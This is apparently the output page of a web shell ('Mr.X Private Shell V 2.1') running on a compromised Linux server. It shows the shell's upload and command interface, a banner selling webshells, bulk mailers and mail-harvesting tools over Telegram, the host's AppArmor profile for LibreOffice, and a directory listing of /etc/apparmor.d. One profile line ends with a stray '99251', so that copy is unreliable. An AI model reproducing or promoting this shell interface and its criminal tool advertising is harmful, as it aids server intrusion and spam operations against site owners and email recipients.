__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

[email protected]: ~ $ 
# ------------------------------------------------------------------
#
#    Copyright (C) 2016 Canonical Ltd.
#    Copyright (C) 2018 Software in the Public Interest, Inc.
#    Copyright (C) 2021 Google LLC
#
#    This Source Code Form is subject to the terms of the Mozilla Public
#    License, v. 2.0. If a copy of the MPL was not distributed with this
#    file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
#    Authors: Jonathan Davies <[email protected]>
#             Bryan Quigley <[email protected]>
#             Rene Engelhard <[email protected]>
#
# ------------------------------------------------------------------

# This profile should enable the average LibreOffice user to get their 
# work done while blocking some advanced usage
# Namely not tested and likely not working : embedded plugins,
# Using the LibreOffice SDK and other development tasks
# Everything else should be working

#Defines all common supported file formats
#Some obscure ones we're excluded (mostly input)

#Generic
#.txt
@{libreoffice_ext} = [tT][xX][tT]
#All the open document format
@{libreoffice_ext} += {,f,F}[oO][dDtT][tTsSpPbBgGfF]
#.xml and xsl
@{libreoffice_ext} += [xX][mMsS][lL]
#.pdf
@{libreoffice_ext} += [pP][dD][fF]
#Unified office format
@{libreoffice_ext} += [uU][oO][fFtTsSpP]
#(x)htm(l)
@{libreoffice_ext} += {,x,X}[hH][tT][mM]{,l,L}
#.epub
@{libreoffice_ext} += [eE][pP][uU][bB]
#.ps (printing to file)
@{libreoffice_ext} += [pP][sS]

#Images
@{libreoffice_ext} += [jJ][pP][gG]
@{libreoffice_ext} += [jJ][pP][eE][gG]
@{libreoffice_ext} += [pP][nN][gG]
@{libreoffice_ext} += [sS][vV][gG]
@{libreoffice_ext} += [sS][vV][gG][zZ]99251
@{libreoffice_ext} += [tT][iI][fF]
@{libreoffice_ext} += [tT][iI][fF][fF]

#Writer
@{libreoffice_ext} += [dD][oO][cCtT]{,x,X}
@{libreoffice_ext} += [rR][tT][fF]

#Calc
@{libreoffice_ext} += [xX][lL][sStT]{,x,X,m,M}
@{libreoffice_ext} += [xX][lL][wW]
#.dif dbf
@{libreoffice_ext} += [dD][iIbB][fF]
#.tsv .csv
@{libreoffice_ext} += [cCtT][sS][vV]
@{libreoffice_ext} += [sS][lL][kK]

#Impress/Draw
@{libreoffice_ext} += [pP][pP][tTsS]{,x,X}
@{libreoffice_ext} += [pP][oO][tT]{,m,M}
#Photoshop
@{libreoffice_ext} += [pP][sS][dD]

#Math
@{libreoffice_ext} += [mM][mM][lL]

@{libo_user_dirs} = @{HOME} /mnt /media

#include <tunables/global>

profile libreoffice-soffice /usr/lib/libreoffice/program/soffice.bin flags=(complain) {
  #include <abstractions/private-files>

  #include <abstractions/audio>
  #include <abstractions/bash>
  #include <abstractions/cups-client>
  #include <abstractions/dbus>
  #include <abstractions/dbus-session>
  #include <abstractions/dbus-accessibility>
  #include <abstractions/dri-enumerate>
  #include <abstractions/mesa>
  #include <abstractions/ibus>
  #include <abstractions/nameservice>
  #include <abstractions/gnome>
# GnuPG1 only...
# #include <abstractions/gnupg>
  #include <abstractions/python>
  #include <abstractions/p11-kit>

  #include <abstractions/user-tmp>

  #include <abstractions/opencl-intel>
  #include <abstractions/opencl-mesa>
  #include <abstractions/opencl-nvidia>

  #List directories for file browser
  /                                     r,
  /**/                                  r,

  owner @{libo_user_dirs}/**/           rw,  #allow creating directories that we own
  owner @{libo_user_dirs}/**~lock.*     rw,  #lock file support
  owner @{libo_user_dirs}/**.@{libreoffice_ext} rwk,  #Open files rw with the right exts
  owner @{libo_user_dirs}/{,**/}lu????????{,?,??,???,????}.tmp rwk, #Temporary file used when saving
  owner @{libo_user_dirs}/{,**/}.directory r, #Read directory settings on KDE

  # Settings
  /etc/libreoffice/                     r,
  /etc/libreoffice/**                   r,

  /etc/cups/ppd/*.ppd                   r,
  /etc/xml/catalog                      r, #exporting to .xhtml, for libxml2
  /proc/*/status                        r,

  owner @{HOME}/.config/libreoffice{,dev}/** rwk,
  owner @{HOME}/.config/soffice.binrc rwl -> @{HOME}/.config/#[0-9]*,
  owner @{HOME}/.config/soffice.binrc.* rwl -> @{HOME}/.config/#[0-9]*,
  owner @{HOME}/.config/soffice.binrc.lock rwk,
  owner @{HOME}/.cache/fontconfig/**    rw,
  owner @{HOME}/.config/gtk-???/bookmarks r,  #Make bookmarks work

  owner /{,var/}run/user/*/dconf/user   rw,
  owner @{HOME}/.config/dconf/user      r,

  # allow schema to be read
  /usr/share/glib-*/schemas/            r,
  /usr/share/glib-*/schemas/**          r,

  # bluetooth send to
  network bluetooth,

  /{usr/,}bin/sh                        rmix,
  /{usr/,}bin/bash                      rmix,
  /{usr/,}bin/dash                      rmix,
  /{usr/,}bin/rm                        rmix, #deleting /tmp/psp1534203998 (printing to file)
  /usr/bin/bluetooth-sendto             rmPUx,
  /usr/bin/lpr                          rmPUx,
  /usr/bin/paperconf                    rmix,
  /usr/bin/gpgconf                      rmix,
  /usr/bin/gpg                          rmCx -> gpg,
  /usr/bin/gpgsm                        rmCx -> gpg,
  /usr/bin/gpa                          rix,
  /usr/bin/seahorse                     rix,
  /usr/bin/kgpg                         rix,
  /usr/bin/kleopatra                    rix,

  /dev/tty                              rw,

  /usr/lib{,32,64}/@{multiarch}/gstreamer???/gstreamer-???/gst-plugin-scanner   rmPUx,
  owner @{HOME}/.cache/gstreamer-???/**                                 rw,
  unix peer=(addr=@/tmp/.ICE-unix/* label=unconfined),  #Gstreamer doesn't work without this

  /usr/lib{,32,64}/jvm/                         r,
  /usr/lib{,32,64}/jvm/**                       r,
  /usr/lib{,32,64}/jvm/**/jre/bin/java          mix,
  /usr/lib{,32,64}/jvm/**/bin/java              mix,
  # should be included in the jvm/** above but there it is
  # a symlink, so apparmor still doesn't allow it...
  /etc/java-??-openjdk/security/java.security   r,
  /usr/lib/libreoffice/**                        rw,
  /usr/lib/libreoffice/**.so                     m,
  /usr/lib/libreoffice/program/soffice.bin       mix,
  /usr/lib/libreoffice/program/xpdfimport        px,
  /usr/lib/libreoffice/program/senddoc           px,
  /usr/bin/xdg-open                 rPUx,

  /usr/share/java/**.jar                r,
  /usr/share/hunspell/                  r,
  /usr/share/hunspell/**                r,
  /usr/share/hyphen/                    r,
  /usr/share/hyphen/**                  r,
  /usr/share/mythes/                    r,
  /usr/share/mythes/**                  r,
  /usr/share/liblangtag/                r,
  /usr/share/liblangtag/**              r,
  /usr/share/libreoffice/               r,
  /usr/share/libreoffice/**             r,
  /usr/share/yelp-xsl/xslt/mallard/**   r,
  /usr/share/libexttextcat/*            r,
  /usr/share/icu/**                     r,
  /usr/share/locale-bundle/*            r,

  /var/spool/libreoffice/               r,
  /var/spool/libreoffice/**             rw,
  /var/cache/fontconfig/                rw,

  #Likely moving to abstractions in the future
  owner @{HOME}/.icons/*/cursors/*      r,
  /etc/fstab r, # Solid::DeviceNotifier::instance() TODO: deny?
  /usr/share/*-fonts/conf.avail/*.conf  r,
  /usr/share/fonts-config/conf.avail/*.conf r,
  /{,var/}run/udev/data/+usb:* r, # Solid::Device::listFromQuery()
  /{,var/}run/udev/data/{c,b}*:* r, # Solid::Device::description(), Solid::Device::listFromQuery()
  @{PROC}/sys/kernel/random/boot_id r, # KRecentDocument::add() -> QSysInfo::bootUniqueId()

  #To avoid "Unable to create io-slave." for file dialog
  owner /{,var/}run/user/[0-9]*/#[0-9]* rw,
  #For KIO IO::Slave::createSlave()
  owner /{,var/}run/user/[0-9]*/soffice.bin*.slave-socket wl ->  /{,var/}run/user/[0-9]*/#[0-9]*,

  owner @{HOME}/.mozilla/firefox/profiles.ini r,
  owner @{HOME}/.mozilla/firefox/*/secmod.db r,
  # firefox < 58
  owner @{HOME}/.mozilla/firefox/*/cert8.db r,
  # firefox >= 58
  owner @{HOME}/.mozilla/firefox/*/cert9.db r,

  owner @{HOME}/.local/share/user-places.xbel r,

  # there is abstractions/gnupg but that's just for gpg1...
  profile gpg {
    #include <abstractions/base>

   /usr/bin/gpgconf rm,
   /usr/bin/gpg rm,
   /usr/bin/gpgsm rm,

    owner @{HOME}/.gnupg/* r,
    owner @{HOME}/.gnupg/random_seed rk,
    owner @{HOME}/.gnupg/tofu.db rwk,
    owner /{,var/}run/user/[0-9]*/gnupg/* rw,
  }

  # probably should become a subprofile like gpg above, but then it doesn't
  # work either as it tries to access stuff only allowed above...
  owner @{HOME}/.config/kdeglobals r,
  /usr/lib/libreoffice/program/lo_kde5filepicker rPUx,
  /usr/share/qt5/translations/* r,
  /usr/lib/*/qt5/plugins/** rm,
  /usr/share/plasma/look-and-feel/**/contents/defaults r,

  # TODO: remove when rules are available in abstractions/kde
  owner @{HOME}/.cache/ksycoca5_??_* r, # KDE System Configuration Cache
  owner @{HOME}/.config/baloofilerc r, # indexing options (excludes, etc), used by KFileWidget
  owner @{HOME}/.config/dolphinrc r, # settings used by KFileWidget
  owner @{HOME}/.config/kde.org/libphonon.conf r, # for KNotifications::sendEvent()
  owner @{HOME}/.config/klanguageoverridesrc r, # per-application languages, for KDEPrivate::initializeLanguages() from libKF5XmlGui.so
  owner @{HOME}/.config/trashrc r, # user by KFileWidget
  /usr/share/knotifications5/*.notifyrc r, # KNotification::sendEvent

  # TODO: remove when rules are available in abstractions/kde-write-icon-cache or similar
  owner @{HOME}/.cache/icon-cache.kcache rw, # for KIconLoader

  # TODO: remove when rules are available in abstractions/kdeframeworks5 or similar
  /usr/share/kservices5/*.protocol r,

  # TODO: use qt5-settings-write abstraction when it is available
  owner @{HOME}/.config/#[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9] rw,
  owner @{HOME}/.config/QtProject.conf rw,
  owner @{HOME}/.config/QtProject.conf.?????? l -> @{HOME}/.config/#[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9],
  owner @{HOME}/.config/QtProject.conf.?????? rw, # for temporary files like QtProject.conf.Aqrgeb
  owner @{HOME}/.config/QtProject.conf.lock rwk,

  # TODO: use qt5-compose-cache-write abstraction when it is available
  owner @{HOME}/.cache/qt_compose_cache_{little,big}_endian_* r,

  # TODO: use recent-documents-write abstraction when it is available
  owner @{HOME}/.local/share/RecentDocuments/** r,
  owner @{HOME}/.local/share/RecentDocuments/*.desktop rwl -> @{HOME}/.local/share/RecentDocuments/#[0-9]*,
  owner @{HOME}/.local/share/RecentDocuments/#[0-9]* rw,
  owner @{HOME}/.local/share/RecentDocuments/*.lock rwk,

  # TODO: use kde-globals-write abstraction when it is available
  owner @{HOME}/.config/kdeglobals rw,
  owner @{HOME}/.config/kdeglobals.* rwl -> @{HOME}/.config/#[0-9]*,
  owner @{HOME}/.config/kdeglobals.lock rwk,
}

Filemanager

DIR : / etc/ apparmor.d/
Name Type Size Permission Actions
abi Folder 0755
abstractions Folder 0755
disable Folder 0755
force-complain Folder 0755
local Folder 0755
rsyslog.d Folder 0755
tunables Folder 0755
1password File 354 B 0644
Discord File 352 B 0644
MongoDB_Compass File 386 B 0644
QtWebEngineProcess File 404 B 0644
Xorg File 3.58 KB 0644
alsamixer File 1.22 KB 0644
babeld File 706 B 0644
balena-etcher File 374 B 0644
bfdd File 766 B 0644
bgpd File 818 B 0644
brave File 348 B 0644
buildah File 342 B 0644
bwrap-userns-restrict File 2.96 KB 0644
cam File 330 B 0644
ch-checkns File 351 B 0644
ch-run File 339 B 0644
chrome File 349 B 0644
chromium File 408 B 0644
code File 349 B 0644
crun File 333 B 0644
desktop-icons-ng File 427 B 0644
devhelp File 342 B 0644
dnstracer File 1000 B 0644
eigrpd File 700 B 0644
element-desktop File 368 B 0644
epiphany File 356 B 0644
evolution File 348 B 0644
fabricd File 680 B 0644
firefox File 410 B 0644
flatpak File 342 B 0644
foliate File 342 B 0644
fusermount3 File 1.66 KB 0644
geary File 336 B 0644
github-desktop File 378 B 0644
goldendict File 353 B 0644
iotop-c File 446 B 0644
ipa_verify File 351 B 0644
irssi File 1.19 KB 0644
isisd File 789 B 0644
kchmviewer File 353 B 0644
keybase File 346 B 0644
lc-compliance File 360 B 0644
ldpd File 757 B 0644
libcamerify File 354 B 0644
linux-boot-prober File 1.34 KB 0644
linux-sandbox File 383 B 0644
loupe File 336 B 0644
lsb_release File 1.35 KB 0644
lsblk File 1.09 KB 0644
lsusb File 1.09 KB 0644
lxc-attach File 351 B 0644
lxc-create File 351 B 0644
lxc-destroy File 354 B 0644
lxc-execute File 354 B 0644
lxc-stop File 345 B 0644
lxc-unshare File 354 B 0644
lxc-usernsexec File 363 B 0644
mbsync File 1.2 KB 0644
mmdebstrap File 351 B 0644
mosquitto File 1.59 KB 0644
msedge File 352 B 0644
nc.openbsd File 803 B 0644
nhrpd File 792 B 0644
notepadqq File 402 B 0644
nvidia_modprobe File 1.18 KB 0644
obsidian File 350 B 0644
opam File 333 B 0644
openvpn File 3.88 KB 0644
opera File 355 B 0644
os-prober File 1.71 KB 0644
ospf6d File 869 B 0644
ospfd File 1.09 KB 0644
pageedit File 347 B 0644
pathd File 674 B 0644
pbrd File 671 B 0644
pim6d File 721 B 0644
pimd File 718 B 0644
plasmashell File 1005 B 0644
podman File 339 B 0644
polypane File 350 B 0644
privacybrowser File 365 B 0644
qcam File 333 B 0644
qmapshack File 348 B 0644
qutebrowser File 354 B 0644
remmina File 2.9 KB 0644
ripd File 705 B 0644
ripngd File 677 B 0644
rootlesskit File 354 B 0644
rpm File 330 B 0644
rssguard File 347 B 0644
runc File 340 B 0644
rygel File 3.99 KB 0644
sbuild File 427 B 0644
sbuild-abort File 445 B 0644
sbuild-adduser File 452 B 0644
sbuild-apt File 439 B 0644
sbuild-checkpackages File 469 B 0644
sbuild-clean File 445 B 0644
sbuild-createchroot File 466 B 0644
sbuild-destroychroot File 470 B 0644
sbuild-distupgrade File 463 B 0644
sbuild-hold File 442 B 0644
sbuild-shell File 445 B 0644
sbuild-unhold File 448 B 0644
sbuild-update File 448 B 0644
sbuild-upgrade File 451 B 0644
scide File 355 B 0644
signal-desktop File 366 B 0644
slack File 342 B 0644
slirp4netns File 517 B 0644
staticd File 788 B 0644
steam File 363 B 0644
stress-ng File 348 B 0644
surfshark File 354 B 0644
systemd-coredump File 377 B 0644
thunderbird File 354 B 0644
tinyproxy File 1.86 KB 0644
tnftp File 2.54 KB 0644
toybox File 339 B 0644
transmission File 2.38 KB 0644
trinity File 342 B 0644
tshark File 1.7 KB 0644
tup File 330 B 0644
tuxedo-control-center File 400 B 0644
ubuntu_pro_apt_news File 1.8 KB 0644
ubuntu_pro_esm_cache File 6.71 KB 0644
unix-chkpwd File 881 B 0644
unprivileged_userns File 699 B 0644
userbindmount File 360 B 0644
usr.bin.man File 3.37 KB 0644
usr.bin.papers File 11.2 KB 0644
usr.bin.tcpdump File 1.65 KB 0644
usr.bin.wsdd File 1.15 KB 0644
usr.lib.libreoffice.program.oosplash File 1.48 KB 0644
usr.lib.libreoffice.program.senddoc File 1.2 KB 0644
usr.lib.libreoffice.program.soffice.bin File 10.49 KB 0644
usr.lib.libreoffice.program.xpdfimport File 1.02 KB 0644
usr.lib.snapd.snap-confine.real File 31.04 KB 0644
usr.sbin.cups-browsed File 767 B 0644
usr.sbin.cupsd File 6.11 KB 0644
usr.sbin.mysqld File 1.96 KB 0644
usr.sbin.rsyslogd File 1.69 KB 0644
usr.sbin.sssd File 1.47 KB 0644
uwsgi-core File 351 B 0644
vdens File 336 B 0644
virtiofsd File 352 B 0644
vivaldi-bin File 358 B 0644
vpnns File 336 B 0644
vrrpd File 674 B 0644
wg File 968 B 0644
wg-quick File 2.93 KB 0644
wike File 333 B 0644
wpcom File 346 B 0644
znc File 1.14 KB 0644

Copyright reserved © 2026 xtooler.online Shell Coded By Mr.X

Filemanager